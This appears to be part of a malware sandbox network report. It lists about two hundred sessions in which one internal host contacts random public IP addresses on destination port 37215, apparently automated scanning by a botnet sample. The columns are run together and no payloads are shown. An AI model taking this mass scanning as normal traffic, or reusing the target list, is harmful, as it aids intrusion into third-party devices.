                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17734192.168.2.1356308197.99.22.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17735192.168.2.1351184176.84.90.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17736192.168.2.1335662157.34.231.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17737192.168.2.134479298.189.55.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17738192.168.2.1334566157.127.204.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17739192.168.2.1341706222.21.85.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17740192.168.2.133652442.142.242.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17741192.168.2.1338186197.101.142.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17742192.168.2.133866227.22.203.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17743192.168.2.133739273.1.129.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17744192.168.2.1338124197.226.113.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17745192.168.2.134373041.18.142.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17746192.168.2.135653041.161.157.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17747192.168.2.1348232163.6.81.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17748192.168.2.1340830157.101.106.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17749192.168.2.134982241.62.213.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17750192.168.2.1343512197.10.126.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17751192.168.2.136069245.186.115.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17752192.168.2.135547441.0.45.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17753192.168.2.1357264197.129.185.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17754192.168.2.1344036197.121.5.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17755192.168.2.133377241.124.80.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17756192.168.2.1352138157.185.130.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17757192.168.2.1349330197.117.0.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17758192.168.2.135020241.178.186.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17759192.168.2.1349946197.109.197.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17760192.168.2.134785241.97.110.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17761192.168.2.135012241.114.156.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17762192.168.2.134175841.65.124.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17763192.168.2.1333904197.232.181.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17764192.168.2.134305420.91.107.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17765192.168.2.1356128157.222.12.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17766192.168.2.1334406197.17.111.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17767192.168.2.1333040157.233.107.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17768192.168.2.1349460197.165.217.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17769192.168.2.1351152135.148.134.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17770192.168.2.135261241.214.144.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17771192.168.2.1339996113.165.243.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17772192.168.2.1344950157.192.226.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17773192.168.2.135626641.153.114.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17774192.168.2.1360052209.8.113.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17775192.168.2.1342472157.218.9.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17776192.168.2.1341504197.24.8.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17777192.168.2.1345688157.188.174.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17778192.168.2.1339360157.28.146.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17779192.168.2.135300441.136.160.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17780192.168.2.1332982197.206.6.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17781192.168.2.133737260.45.29.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17782192.168.2.135819441.145.106.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17783192.168.2.1346516197.23.16.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17784192.168.2.1356574157.105.131.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17785192.168.2.1343718157.208.90.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17786192.168.2.1340864150.75.163.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17787192.168.2.1333090197.54.46.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17788192.168.2.1344816220.26.132.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17789192.168.2.1353872157.105.231.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17790192.168.2.1334692197.225.30.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17791192.168.2.1347210197.90.184.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17792192.168.2.134777671.101.2.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17793192.168.2.133984641.161.134.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17794192.168.2.1340180141.236.55.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17795192.168.2.1350746197.84.95.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17796192.168.2.1353962157.66.80.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17797192.168.2.1353960107.55.212.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17798192.168.2.1351196157.182.143.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17799192.168.2.1351932157.80.123.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17800192.168.2.1335634157.157.60.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17801192.168.2.135738441.66.91.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17802192.168.2.1352074170.235.151.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17803192.168.2.1348826101.88.107.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17804192.168.2.1341592137.177.164.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17805192.168.2.133839094.137.70.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17806192.168.2.1352128157.177.48.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17807192.168.2.135371441.73.93.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17808192.168.2.134154254.232.101.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17809192.168.2.135192441.29.47.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17810192.168.2.1346016197.173.78.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17811192.168.2.1334076157.84.138.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17812192.168.2.133916441.128.27.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17813192.168.2.1333336124.20.166.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17814192.168.2.1333118109.90.58.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17815192.168.2.135126441.167.146.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17816192.168.2.134196441.145.110.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17817192.168.2.1336212197.5.236.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17818192.168.2.136017641.13.166.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17819192.168.2.1346466124.200.133.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17820192.168.2.1338662204.51.145.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17821192.168.2.1346898197.92.212.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17822192.168.2.135519849.116.232.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17823192.168.2.1336174157.38.137.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17824192.168.2.134356644.230.171.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17825192.168.2.1343024212.185.132.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17826192.168.2.1347196157.115.7.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17827192.168.2.1349726197.41.90.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17828192.168.2.134816841.142.26.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17829192.168.2.135044841.213.60.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17830192.168.2.1348924197.198.246.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17831192.168.2.1357048197.141.100.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17832192.168.2.1360764197.208.226.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17833192.168.2.1344648157.238.146.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17834192.168.2.1350206189.161.36.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17835192.168.2.135979841.8.46.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17836192.168.2.135581041.91.146.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17837192.168.2.133963641.2.233.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17838192.168.2.1337618190.98.90.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17839192.168.2.1360388157.4.223.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17840192.168.2.1334700197.246.128.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17841192.168.2.1359584197.173.241.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17842192.168.2.135365623.142.61.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17843192.168.2.1333148197.8.179.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17844192.168.2.1356658172.106.58.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17845192.168.2.1356722103.181.141.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17846192.168.2.134034441.210.192.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17847192.168.2.135538447.237.177.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17848192.168.2.134516041.71.176.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17849192.168.2.133624641.76.187.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17850192.168.2.134337641.163.252.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17851192.168.2.1348824157.74.66.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17852192.168.2.1347414209.241.239.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17853192.168.2.135280241.57.244.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17854192.168.2.135134241.73.225.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17855192.168.2.134700865.114.20.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17856192.168.2.133823041.135.195.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17857192.168.2.136000453.25.119.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17858192.168.2.1354008197.44.3.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17859192.168.2.1358180200.130.78.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17860192.168.2.1338726197.67.107.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17861192.168.2.1337730202.186.48.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17862192.168.2.1336386157.203.135.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17863192.168.2.1340946197.65.19.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17864192.168.2.1350904157.111.149.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17865192.168.2.1352906157.233.69.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17866192.168.2.1337538197.48.121.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17867192.168.2.136012220.82.131.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17868192.168.2.1359870197.140.119.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17869192.168.2.135984883.39.78.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17870192.168.2.1349696197.255.155.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17871192.168.2.1334978157.172.86.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17872192.168.2.1339198157.205.135.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17873192.168.2.1339276197.34.131.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17874192.168.2.135852441.6.230.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17875192.168.2.1338968197.88.93.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17876192.168.2.1358396194.202.39.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17877192.168.2.1341140101.12.208.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17878192.168.2.1340312157.84.110.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17879192.168.2.1334032193.157.238.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17880192.168.2.1344972197.95.79.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17881192.168.2.1340300197.172.166.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17882192.168.2.135514841.122.120.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17883192.168.2.1343772186.247.12.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17884192.168.2.1334470157.45.26.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17885192.168.2.1346802126.48.70.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17886192.168.2.1341660197.9.254.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17887192.168.2.134266441.64.108.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17888192.168.2.1360912197.210.153.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17889192.168.2.1339244194.212.186.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17890192.168.2.1350352197.146.121.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17891192.168.2.1346146119.89.212.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17892192.168.2.133849241.248.190.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17893192.168.2.135483041.254.94.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17894192.168.2.1333404157.223.145.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17895192.168.2.135363641.141.156.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17896192.168.2.134014041.34.166.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17897192.168.2.1344870157.185.99.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17898192.168.2.1357434197.198.60.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17899192.168.2.1354000101.46.45.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17900192.168.2.1348048107.79.125.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17901192.168.2.135073042.24.202.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17902192.168.2.1337030157.148.229.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17903192.168.2.1344958197.34.145.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17904192.168.2.1337372157.227.41.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17905192.168.2.1347310194.192.132.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17906192.168.2.1334342218.46.94.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17907192.168.2.1333706197.178.202.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17908192.168.2.133582041.187.208.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17909192.168.2.135508641.136.169.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17910192.168.2.1334828197.61.8.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17911192.168.2.1352990157.80.185.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17912192.168.2.1339846154.217.89.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17913192.168.2.1344808197.164.94.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17914192.168.2.133353041.250.132.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17915192.168.2.134079841.45.90.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17916192.168.2.133893641.165.63.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17917192.168.2.1348182197.48.26.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17918192.168.2.1351046197.172.100.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17919192.168.2.1344884197.68.236.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17920192.168.2.1357714150.57.6.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17921192.168.2.1340448157.198.240.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17922192.168.2.1334474157.221.4.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17923192.168.2.1358056157.54.154.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17924192.168.2.1360878188.63.253.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17925192.168.2.1340308157.220.208.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17926192.168.2.133635087.59.142.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17927192.168.2.1359722191.37.231.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17928192.168.2.1346640197.250.181.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17929192.168.2.1349164197.66.130.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17930192.168.2.1342894197.43.239.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17931192.168.2.1349620157.109.59.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17932192.168.2.1351492157.233.71.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17933192.168.2.1335722138.56.73.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17934192.168.2.1344460216.70.237.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17935192.168.2.1340584106.140.168.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17936192.168.2.1346298157.240.103.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17937192.168.2.1350632197.203.129.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17938192.168.2.1347392197.251.208.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17939192.168.2.1336754197.179.8.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17940192.168.2.1360566104.87.148.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17941192.168.2.13530602.45.181.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17942192.168.2.1334400157.239.69.2737215
                                                  TimestampBytes transferredDirectionData


